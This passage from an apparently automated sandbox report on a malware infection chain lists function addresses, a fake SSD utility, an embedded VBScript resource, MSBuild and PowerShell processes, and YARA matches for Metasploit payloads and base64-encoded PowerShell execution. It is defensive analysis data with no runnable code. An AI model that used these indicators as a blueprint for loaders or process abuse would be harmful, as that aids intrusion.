                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,14_2_00007FF7444E2C54
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,14_2_00007FF7444E1C0C
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_0040840C11_2_0040840C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00470C7412_2_00470C74
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0043533C12_2_0043533C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004813C412_2_004813C4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046784812_2_00467848
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004303D012_2_004303D0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0044453C12_2_0044453C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004885E012_2_004885E0
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0043463812_2_00434638
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00444AE412_2_00444AE4
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0048ED0C12_2_0048ED0C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00430F5C12_2_00430F5C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045F16C12_2_0045F16C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004451DC12_2_004451DC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045B21C12_2_0045B21C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_004455E812_2_004455E8
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0048768012_2_00487680
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046989C12_2_0046989C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00451A3012_2_00451A30
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0043DDC412_2_0043DDC4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_0040100013_2_00401000
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_004067B713_2_004067B7
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609660FA13_2_609660FA
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092114F13_2_6092114F
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6091F2C913_2_6091F2C9
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096923E13_2_6096923E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093323D13_2_6093323D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095C31413_2_6095C314
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095031213_2_60950312
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094D33B13_2_6094D33B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093B36813_2_6093B368
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096748C13_2_6096748C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093F42E13_2_6093F42E
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095447013_2_60954470
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609615FA13_2_609615FA
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096A5EE13_2_6096A5EE
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096D6A413_2_6096D6A4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_609606A813_2_609606A8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093265413_2_60932654
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6095566513_2_60955665
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094B7DB13_2_6094B7DB
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6092F74D13_2_6092F74D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096480713_2_60964807
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094E9BC13_2_6094E9BC
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093792913_2_60937929
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6093FAD613_2_6093FAD6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6096DAE813_2_6096DAE8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_6094DA3A13_2_6094DA3A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60936B2713_2_60936B27
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60954CF613_2_60954CF6
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60950C6B13_2_60950C6B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60966DF113_2_60966DF1
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60963D3513_2_60963D35
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60909E9C13_2_60909E9C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60951E8613_2_60951E86
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60912E0B13_2_60912E0B
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_60954FF813_2_60954FF8
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB2A9013_2_02BB2A90
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BAD33F13_2_02BAD33F
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BABB0D13_2_02BABB0D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B9E09413_2_02B9E094
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA70D013_2_02BA70D0
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB268D13_2_02BB268D
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BAB61913_2_02BAB619
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BABF2513_2_02BABF25
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BA875A13_2_02BA875A
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02BB0DC413_2_02BB0DC4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E5D9014_2_00007FF7444E5D90
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1D2814_2_00007FF7444E1D28
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E2DB414_2_00007FF7444E2DB4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E6CA414_2_00007FF7444E6CA4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E66C414_2_00007FF7444E66C4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E40C414_2_00007FF7444E40C4
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E353014_2_00007FF7444E3530
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1C0C14_2_00007FF7444E1C0C
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFAAC2620DD18_2_00007FFAAC2620DD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041607C23_2_0041607C
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044A03023_2_0044A030
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044F0C023_2_0044F0C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041095E23_2_0041095E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044617023_2_00446170
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041B10023_2_0041B100
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041318323_2_00413183
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040B99023_2_0040B990
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004312E023_2_004312E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C37523_2_0041C375
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437B2523_2_00437B25
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040F3F023_2_0040F3F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044640023_2_00446400
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044E55023_2_0044E550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00411D6023_2_00411D60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042DD7023_2_0042DD70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041BFAA23_2_0041BFAA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040104023_2_00401040
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044087023_2_00440870
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043500F23_2_0043500F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044803223_2_00448032
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044D03823_2_0044D038
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004240E023_2_004240E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004470E023_2_004470E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004488E323_2_004488E3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004308F023_2_004308F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042509023_2_00425090
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042116023_2_00421160
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041F16923_2_0041F169
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043197323_2_00431973
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004449FD23_2_004449FD
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044A98023_2_0044A980
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C1A023_2_0040C1A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C9A023_2_0040C9A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004381B423_2_004381B4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00408A5023_2_00408A50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C74B23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041FA6F23_2_0041FA6F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00417A7023_2_00417A70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00445A0023_2_00445A00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044EA1023_2_0044EA10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040A22023_2_0040A220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041222B23_2_0041222B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044DAF023_2_0044DAF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040EA9D23_2_0040EA9D
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042A2B023_2_0042A2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043334323_2_00433343
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043D34823_2_0043D348
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041D36123_2_0041D361
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00426B1023_2_00426B10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00402B2023_2_00402B20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042D3C723_2_0042D3C7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043F3DA23_2_0043F3DA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004373DF23_2_004373DF
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043A3E023_2_0043A3E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004243F023_2_004243F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00443BFA23_2_00443BFA
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00424BB023_2_00424BB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040944023_2_00409440
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00423C4023_2_00423C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00410C5023_2_00410C50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044745023_2_00447450
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00423C5723_2_00423C57
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00432C5823_2_00432C58
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437C5F23_2_00437C5F
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040B41023_2_0040B410
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040AC2023_2_0040AC20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041E4C223_2_0041E4C2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040C4D023_2_0040C4D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00429CE023_2_00429CE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0042BCE923_2_0042BCE9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00437C5D23_2_00437C5D
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043FC9023_2_0043FC90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043E4A923_2_0043E4A9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00416CB723_2_00416CB7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00407D5023_2_00407D50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044ED5023_2_0044ED50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043656023_2_00436560
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040352023_2_00403520
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044053023_2_00440530
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00424DC023_2_00424DC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004175D323_2_004175D3
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00436DF023_2_00436DF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00403EC023_2_00403EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00408EC023_2_00408EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004346F023_2_004346F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00414EF423_2_00414EF4
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00439E9A23_2_00439E9A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F4423_2_00438F44
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041C74B23_2_0041C74B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044D75023_2_0044D750
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0043176023_2_00431760
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0041DF2A23_2_0041DF2A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004207F023_2_004207F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0040278023_2_00402780
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F8223_2_00438F82
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_00438F9323_2_00438F93
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_0044DF9023_2_0044DF90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004247A023_2_004247A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004047A223_2_004047A2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 23_2_004457A023_2_004457A0
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: String function: 02BB2A20 appears 134 times
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: String function: 02BA7770 appears 32 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041B0F0 appears 116 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B210 appears 48 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00408C1C appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00406AD4 appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 0040596C appears 117 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00407904 appears 43 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403400 appears 60 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00445E48 appears 45 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00457FC4 appears 77 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00457DB8 appears 102 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00434550 appears 32 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403494 appears 85 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 004533B8 appears 98 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00446118 appears 58 times
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: String function: 00403684 appears 229 times
                            Source: MnzBi21FK.exe.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5908 bytes, 1 file, at 0x2c +A "67c2163c9db39.vbs", ID 1251, number 1, 1 datablock, 0x1503 compression
                            Source: UNIQ[1].file.9.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 5908 bytes, 1 file, at 0x2c +A "67c2163c9db39.vbs", ID 1251, number 1, 1 datablock, 0x1503 compression
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: N7LnRW81Rfq.tmp.11.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-SDRVH.tmp.12.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: is-PEPS4.tmp.12.drStatic PE information: Number of sections : 19 > 10
                            Source: sqlite3.dll.13.drStatic PE information: Number of sections : 19 > 10
                            Source: MnzBi21FK.exe.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                            Source: UNIQ[1].file.9.drStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
                            Source: soft.exe, 00000005.00000002.1724312184.000000000A004000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs soft.exe
                            Source: soft.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5236
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5236Jump to behavior
                            Source: 00000005.00000002.1724312184.000000000A03E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                            Source: 00000005.00000002.1724312184.0000000009FAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                            Source: 00000005.00000002.1724312184.0000000009F58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                            Source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
